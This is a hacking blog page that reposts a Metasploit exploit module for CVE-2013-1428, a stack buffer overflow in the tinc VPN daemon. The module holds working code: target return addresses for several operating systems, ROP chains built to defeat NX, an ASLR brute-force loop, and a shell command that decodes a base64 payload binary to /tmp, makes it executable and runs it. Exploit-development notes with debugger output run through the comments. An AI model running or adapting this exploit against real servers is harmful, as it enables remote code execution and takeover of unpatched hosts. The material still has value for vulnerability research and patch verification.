Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86398741

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'securerandom'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::TincdExploitClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Tinc's tincd
        service. After authentication, a specially crafted tcp packet (default port 655)
        leads to a buffer overflow and allows to execute arbitrary code. This module has
        been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7
        (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of
        FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works
        for all versions <= 1.1pre6.
        A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to
        be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd
        was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module
        it was recommended to the maintainer to start using DEP/ASLR and other protection
        mechanisms.
      },
      'Author'         =>
        [
            # PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module
            'Tobias Ospelt <tobias[at]modzero.ch>', # @floyd_ch
            # original finding, python PoC crash
            'Martin Schobert <schobert[at]modzero.ch>' # @nitram2342
        ],
      'References'     =>
        [
          ['CVE', '2013-1428'],
          ['OSVDB', '92653'],
          ['BID', '59369'],
          ['URL', 'http://www.floyd.ch/?p=741'],
          ['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/'],
          ['URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1428']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'    => 1675,
          'DisableNops' => true
        },
      'Privileged'     => true,
      'Targets'        =>
          [
            # full exploitation x86:
            ['Windows XP x86, tinc 1.1.pre6 (exe installer)',  { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['Windows 7 x86, tinc 1.1.pre6 (exe installer)',  { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }],
            ['Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', {
              'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
              ],
            ['Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', {
              'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
              ],
            ['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }],
            ['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }],
            # full exploitation ARM:
            ['Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)',  {
              'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668 }
            ],
            ['Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)',  {
              'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668 }
            ],
            # crash only:
            ['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
            ['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)',  { 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }]
          ],
      'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013
      'DefaultTarget'  => 0))

    register_options(
        [ # Only for shellcodes that write binary to disk
          # Has to be short, usually either . or /tmp works
          # /tmp could be mounted as noexec
          # . is usually only working if tincd is running as root
          OptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']),
          OptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]),
          OptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR brute force)', 3])
        ], self
      )
  end

  def exploit
    # #
    # x86
    # #
    # WINDOWS XP and 7 full exploitation
    # Simple, we only need some mona.py magic
    # C:\Program Files\tinc>"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" "C:\Program Files\tinc\tincd.exe -D -d 5"
    # !mona config -set workingfolder c:\logs\%p
    # !mona pc 1682
    #  --> C:\logs\tincd\pattern
    # !mona findmsp
    # Straight forward, when we overwrite EIP the second value
    # on the stack is pointing to our payload.
    # !mona findwild -o -type instr -s "pop r32# ret"

    # FREEBSD full exploitation
    # Same offset as windows, same exploitation method
    # But we needed a new pop r32# ret for the freebsd version
    # No mona.py help on bsd or linux so:
    # - Dumped .text part of tincd binary in gdb
    # - Search in hex editor for opcodes for "pop r32# ret":
    #  58c3, 59c3, ..., 5fc3
    # - Found a couple of 5dc3. ret = start of .text + offset in hex editor
    # - 0x0804BABB works very well

    # UBUNTU crash only
    # Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because
    # the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known
    # at compile time. gcc is introducing a call to __memcpy_chk:
    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
    # memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print
    # *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed
    # from the repository. It might be exploitable for versions compiled with an older version of gcc.
    # memcpy_chk seems to be in gcc since 2005:
    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
    # http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088

    # OPENSUSE
    # OpenSuse 11.2
    # Installation as described on the tincd website. For 11.2 there are two versions.
    # Decided for 1.0.16 as this is a vulnerable version
    # wget "http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm"
    # rpm -i tinc-1.0.16-3.1.i586.rpm
    # Again, strace shows us that the buffer overflow was detected (see Ubuntu)
    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
    # So a crash-only non-exploitable bof here. So let's go for manual install:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yast -i gcc zlib zlib-devel && echo "yast is still ugly" && zypper install lzo-devel libopenssl-devel make && make && make install
    # Exploitable. Let's see:
    # tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means:
    # the offset to pop ebp; ret is 0x0804b07f

    # FEDORA
    # Fedora 16
    # yum has version 1.0.19
    # yum install tinc
    # Non-exploitable crash, see Ubuntu. Strace tells us:
    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
    # About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23
    # Manual compile went on with Fedora 19
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install
    # Don't forget to stop firewalld for testing, as the port is still closed otherwise
    # # hardening-check tincd
    # tincd:
    #  Position Independent Executable: no, normal executable!
    #  Stack protected: no, not found!
    #  Fortify Source functions: no, only unprotected functions found!
    #  Read-only relocations: yes
    #  Immediate binding: no, not found!
    # Running this module with target set to Windows:
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x0041caa6 in ?? ()
    # well and that's our windows offset...
    # (gdb) info proc mappings
    # 0x8048000  0x8068000    0x20000        0x0 /usr/local/sbin/tincd
    # After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we
    # can try to execute the payload on the stack, but:
    # (gdb) stepi
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x08e8ee08 in ?? ()
    # Digging deeper we find:
    # dmesg | grep protection
    # [    0.000000] NX (Execute Disable) protection: active
    # or:
    # # objdump -x /usr/local/sbin/tincd
    # [...] STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4
    #       filesz 0x00000000 memsz 0x00000000 flags rw-
    # or: https://bugzilla.redhat.com/show_bug.cgi?id=996365
    # Time for ROP
    # To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode
    # as a pointer to instructions). Was lucky after some searching:
    # (gdb) x/10i 0x4d10ee87
    #    0x4d10ee87:  pop    %ebx
    #    0x4d10ee88:  mov    $0xf5d299dd,%eax
    #    0x4d10ee8d:  rcr    %cl,%al
    #    0x4d10ee8f:  pop    %esp
    #    0x4d10ee90:  ret

    # ARCHLINUX
    # archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # pacman -S gcc zlib lzo openssl make && ./configure && make && make install
    # Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000
    # -->Ret: 0x8065929
    # No NX protection, it simply runs the shellcode :)

    # #
    # ARM
    # #
    # ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi
    # Although this is more for the interested reader, as Pidora development
    # already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs
    # meaning it's an ARMv6 architecture
    # yum has fixed version 1.0.21, so went for manual compile:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install
    # Is the binary protected?
    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
    # # ./checksec.sh --file /usr/local/sbin/tincd
    # RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
    # No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   /usr/local/sbin/tincd
    # so again NX... but what about the system things?
    #  cat /proc/sys/kernel/randomize_va_space
    # 2
    # --> "Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment.
    #      This is the default setting."
    # Here some examples of the address of the system function:
    # 0xb6c40848
    # 0xb6cdd848
    # 0xb6c7c848
    # Looks like we would have to brute force one byte
    # (gdb) info proc mappings
    #  0x8000    0x23000    0x1b000          0         /usr/local/sbin/tincd
    # 0x2b000    0x2c000     0x1000    0x1b000         /usr/local/sbin/tincd
    # When we exploit we get the following:
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x90909090 in ?? ()
    # ok, finally a different offset to eip. Let's figure it out:
    # $ tools/pattern_create.rb 1676
    # Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get:
    # (gdb) break *0x9000
    # Breakpoint 1 at 0x9000
    # See that our shellcode is *on* the stack:
    # (gdb) x/10x $sp
    # 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698
    # 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode
    # 0xbee14328: 0xe3a02006 0xe3a07001
    # let's explore the code we can reuse:
    # (gdb) info functions
    # objdump -d /usr/local/sbin/tincd >assembly.txt
    # while simply searching for the bx instruction we were not very lucky,
    # but searching for some "pop pc" it's easy to find nice gadgets.
    # we can write arguments to the .data section again:
    # 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS
    # The problem is we can not reliably forecast the system function's address, but it's
    # only one byte random, therefore we have to brute force it and/or find a memory leak.
    # Let's assume it's a restarting daemon:
    # create /etc/systemd/system/tincd.service and fill in Restart=restart-always

    # ARM Debian Wheezy on qemu
    # root@debian:~# apt-cache showpkg tinc
    # Package: tinc
    # Versions:
    # 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages)
    # nice, that's vulnerable
    # apt-get install tinc
    # apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf
    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
    # # ./checksec.sh --file /usr/sbin/tincd
    # RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
    # Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   /usr/sbin/tincd
    # Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here

    packet_payload = payload.encoded
    # Pidora and Fedora/ROP specific things
    if target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/
      rop_generator = nil
      filename = rand_text_alpha(1)
      cd = "cd #{datastore['BINARY_DROP_LOCATION']};"
      cd = '' if datastore['BINARY_DROP_LOCATION'] == '.'

      if target.name =~ /Pidora 18/
        print_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18')
        print_status('This requires a restarting tincd daemon!')
        print_status('Warning: This is likely to get tincd into a state where it doesn\'t accept connections anymore')
        rop_generator = method(:create_pidora_rop)
      elsif target.name =~ /Fedora 19/
        print_status('Using ROP to defeat NX on Fedora 19')
        rop_generator = method(:create_fedora_rop)
      end

      if target.arch.include? ARCH_CMD
        # The CMD payloads are a bit tricky on Fedora. As of december 2013
        # some of the generic unix payloads (e.g. reverse shell with awk) don't work
        # (even when executed directly in a terminal on Fedora)
        # use generic/custom and specify PAYLOADSTR without single quotes
        # it's usually sh -c *bla*
        packet_payload = create_fedora_rop(payload.encoded.split(' ', 3))
      else
        # the binary drop payloads
        packet_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator)
        if packet_payload.length > target['offset']
          print_status("Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version")
          packet_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
          vprint_status("Achieved version with #{packet_payload.length} bytes")
        end
      end
    end

    if packet_payload.length > target['offset']
      fail_with(Exploit::Failure::BadConfig, "The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.")
    end
    injection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V')

    vprint_status("Injection starts with #{injection.unpack('H*')[0][0..30]}...")

    if target.name =~ /Pidora 18/
      # we have to brute force to defeat ASLR
      datastore['BRUTEFORCE_TRIES'].times do
        print_status("Try #{n}: Initializing tinc exploit client (setting up ciphers)")
        setup_ciphers
        print_status('Telling tinc exploit client to connect, handshake and send the payload')
        begin
          send_recv(injection)
        rescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error
          print_error(runtime_error.message)
          print_error(runtime_error.backtrace.join("\n\t"))
        rescue Rex::ConnectionRefused
          print_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.')
          sleep(3)
          next
        end
        secs = datastore['WAIT']
        print_status("Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)")
        sleep(secs)
      end
      print_status("Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.")
    else
      # Setup local ciphers
      print_status('Initializing tinc exploit client (setting up ciphers)')
      setup_ciphers
      # The tincdExploitClient will do the crypto handshake with the server and
      # send the injection (a packet), where the actual buffer overflow is triggered
      print_status('Telling tinc exploit client to connect, handshake and send the payload')
      send_recv(injection)
    end
    print_status('Exploit finished')
  end

  def get_cmd_binary_drop_payload(filename, cd, rop_generator)
    elf_base64 = Rex::Text.encode_base64(generate_payload_exe)
    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}"]
    vprint_status("You will try to execute #{cmd.join(' ')}")
    rop_generator.call(cmd)
  end

  def get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
    elf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe))
    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}"]
    vprint_status("You will try to execute #{cmd.join(' ')}")
    rop_generator.call(cmd)
  end

  def create_pidora_rop(sys_execv_args)
    sys_execv_args = sys_execv_args.join(' ')
    sys_execv_args += "\x00"

    aslr_byte_guess = SecureRandom.random_bytes(1).ord
    print_status("Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)")

    # Gadgets tincd
    # c714:	e1a00004 	mov	r0, r4
    # c718:	e8bd8010 	pop	{r4, pc}
    mov_r0_r4_pop_r4_ret = [0x0000c714].pack('V')
    pop_r4_ret = [0x0000c718].pack('V')
    # 1cef4:	e580400c 	str	r4, [r0, #12]
    # 1cef8:	e8bd8010 	pop	{r4, pc}
    # mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V')

    # bba0:	e5843000 	str	r3, [r4]
    # bba4:	e8bd8010 	pop	{r4, pc}
    mov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V')

    # 13ccc:	e1a00003 	mov	r0, r3
    # 13cd0:	e8bd8008 	pop	{r3, pc}
    pop_r3_ret = [0x00013cd0].pack('V')

    # address to start rop (removing 6 addresses of garbage from stack)
    # 15cb4:	e8bd85f0 	pop	{r4, r5, r6, r7, r8, sl, pc}
    # start_rop = [0x00015cb4].pack('V')
    # see target Ret

    # system function address base to brute force
    # roughly 500 tests showed addresses between
    # 0xb6c18848 and 0xb6d17848 (0xff distance)
    system_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V')

    # pointer into .data section
    loc_dot_data = 0x0002b3f0 # a location inside .data

    # Rop into system(), prepare address of payload in r0
    rop = ''

    # first, let's put the payload into the .data section

    # Put the first location to write to in r4
    rop += pop_r4_ret

    sys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i|
      # Give location inside .data via stack
      rop += [loc_dot_data + i * 4].pack('V')
      # Pop 4 bytes of the command into r3
      rop += pop_r3_ret
      # Give 4 bytes of command on stack
      if argument_part.length == 4
        rop += argument_part
      else
        rop += argument_part + rand_text_alpha(4 - argument_part.length)
      end
      # Write the 4 bytes to the writable location
      rop += mov_to_r4_addr_pop_r4_ret
    end

    # put the address of the payload into r4
    rop += [loc_dot_data].pack('V')

    # now move r4 to r0
    rop += mov_r0_r4_pop_r4_ret
    rop += rand_text_alpha(4)
    # we don't care what ends up in r4 now

    # call system
    rop += system_addr
  end

  def create_fedora_rop(sys_execv_args)
    # Gadgets tincd
    loc_dot_data = 0x80692e0 # a location inside .data
    pop_eax = [0x8065969].pack('V') # pop eax; ret
    pop_ebx = [0x8049d8d].pack('V') # pop ebx; ret
    pop_ecx = [0x804e113].pack('V') # pop ecx; ret
    xor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret
    # <ATTENTION> This one destroys ebx:
    mov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret
    # </ATTENTION>

    # Gadgets libcrypto.so.10 libcrypto.so.1.0.1e
    xchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret
    # xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret
    # inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret

    # Gadgets libc.so.6 libc-2.17.so
    pop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret
    int_80 = [0x4b6049c5].pack('V') # int 0x80

    # Linux kernel system call 11: sys_execve
    # ROP
    rop = ''

    index = 0
    stored_argument_pointer_offsets = []

    sys_execv_args.each_with_index do |argument, argument_no|
      stored_argument_pointer_offsets << index
      argument.scan(/.{1,4}/).each_with_index do |argument_part, i|
        # Put location to write to in eax
        rop += pop_eax
        # Give location inside .data via stack
        rop += [loc_dot_data + index + i * 4].pack('V')
        # Pop 4 bytes of the command into ecx
        rop += pop_ecx
        # Give 4 bytes of command on stack
        if argument_part.length == 4
          rop += argument_part
        else
          rop += argument_part + rand_text_alpha(4 - argument_part.length)
        end
        # Write the 4 bytes to the writable location
        rop += mov_to_eax_addr
      end
      # We have to end the argument with a zero byte
      index += argument.length
      # We don't have "xor ecx, ecx", but we have it for eax...
      rop += xor_eax_eax
      rop += xchg_ecx_eax
      # Put location to write to in eax
      rop += pop_eax
      # Give location inside .data via stack
      rop += [loc_dot_data + index].pack('V')
      # Write the zeros
      rop += mov_to_eax_addr
      index += 1 # where we can write the next argument
    end

    # Append address of the start of each argument
    stored_argument_pointer_offsets.each do |offset|
      rop += pop_eax
      rop += [loc_dot_data + index].pack('V')
      rop += pop_ecx
      rop += [loc_dot_data + offset].pack('V')
      rop += mov_to_eax_addr
      index += 4
    end
    # end with zero
    rop += xor_eax_eax
    rop += xchg_ecx_eax

    rop += pop_eax
    rop += [loc_dot_data + index].pack('V')
    rop += mov_to_eax_addr

    rop += pop_ebx
    rop += [loc_dot_data].pack('V')

    rop += pop_ecx
    rop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V')

    rop += pop_edx
    rop += [loc_dot_data + index].pack('V')

    # sys call 11 = sys_execve
    rop += pop_eax
    rop += [0x0000000b].pack('V')

    rop += int_80
  end
end